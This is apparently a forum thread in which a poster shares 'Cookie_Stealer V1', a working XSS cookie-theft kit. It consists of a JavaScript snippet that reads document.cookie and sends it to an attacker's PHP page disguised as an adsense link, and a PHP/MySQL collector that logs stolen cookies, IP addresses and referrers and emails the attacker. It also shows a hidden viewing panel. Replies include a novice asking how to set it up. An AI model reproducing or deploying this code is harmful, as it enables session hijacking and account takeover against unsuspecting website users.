Cookie stealer
Cookie stealer
I smoked on the bus(canibus) lol prolly get in trouble that…. <?php /* Requirements:
SQL/PHP
Table structure for table cookiestealer.
CREATE TABLE cookiestealer
(
from
varchar(255) NOT NULL default '',
IP
varchar(255) NOT NULL default '',
cookie
varchar(255) NOT NULL default '',
date
varchar(255) NOT NULL default '',
ID
int(13) NOT NULL auto_increment,
PRIMARY KEY (ID
)
) TYPE=MyISAM AUTO_INCREMENT=1 ;
JS: <script language="javascript"> var refer_code = docu<i></i>ment.cookie; docu<i></i>ment.location="http://yoursite.com/adsense.php?adsense_ID_21="+refer_code; </script>
Copyrighted and Writen by The_Inferno-2005
Null_Branded.org
Cookie_Stealer V1
Freeware
but you can add a script to help me out if you like"
add a script: junkscripts.com
or a link:
411lookup.info
or something you three legged plant we just can't sit here.
*/
$dbh=mysql_connect ("localhost", "inferno_scripts", "drowssap") or die ('I cannot connect to the database because: ' . mysql_error());
mysql_select_db ("inferno_scripts");
$from = $_SERVER['HTTP_REFERER'];
$youremail ="lost_twice@hotmail.com";
$date = date("Y-m-d");
$IP = $_SERVER['REMOTE_ADDR'];
if(isset($_GET['adsense_ID_21'])){
$cookie = $_GET['adsense_ID_21'];
$sql = "INSERT INTO cookiestealer
( from
, IP
, cookie
, date
)
VALUES ('$from', '$IP', '$cookie', '$date')";
mysql_query($sql);
mail($youremail,"Cookie Jar!", "Come Get your cookies. :)");
Header('Location: http://www.google.com/hax_google.txt');
}elseif(isset($_GET['view'])){
if($_GET['view'] == "Isayso"){
if(isset($_GET['delete'])){
$delete =$_GET['delete'];
$sql ="DELETE FROM cookiestealer WHERE ID = '$ID'";
mysql_query($sql);
echo " Cookie deleted";
}
$sql = "SELECT * FROM cookiestealer"; $rs = mysql_query($sql); echo "<H1>Your COokies have been served.</h1>"; while($row = mysql_fetch_array($rs)){
$date = $row['date']; $ip = $row['IP']; $cookie = $row['cookie']; $from = $row['from']; $ID = $row['ID'];
echo "<table border=2 align=center><td><p>".$date."<br> from: ".$from." <br> ip-".$ip." <br>cookie-".$cookie."<br> <a href=\"adsense.php?view=isayso&delete=\"".$ID.">Delete</a></p></td></table>"; }}} ?>
ghost 18 years ago
nvm, i'm a dumass i saw something like this on the internet and i though it was an html code you can send to them then see where they came from before they click the link.
ghost 17 years ago
The_Inferno can you help me out with this thing.I'm a total n00b and i don't get this thing,can you pm me with everything you need to do and where do i get a free host and things like that -:ninja: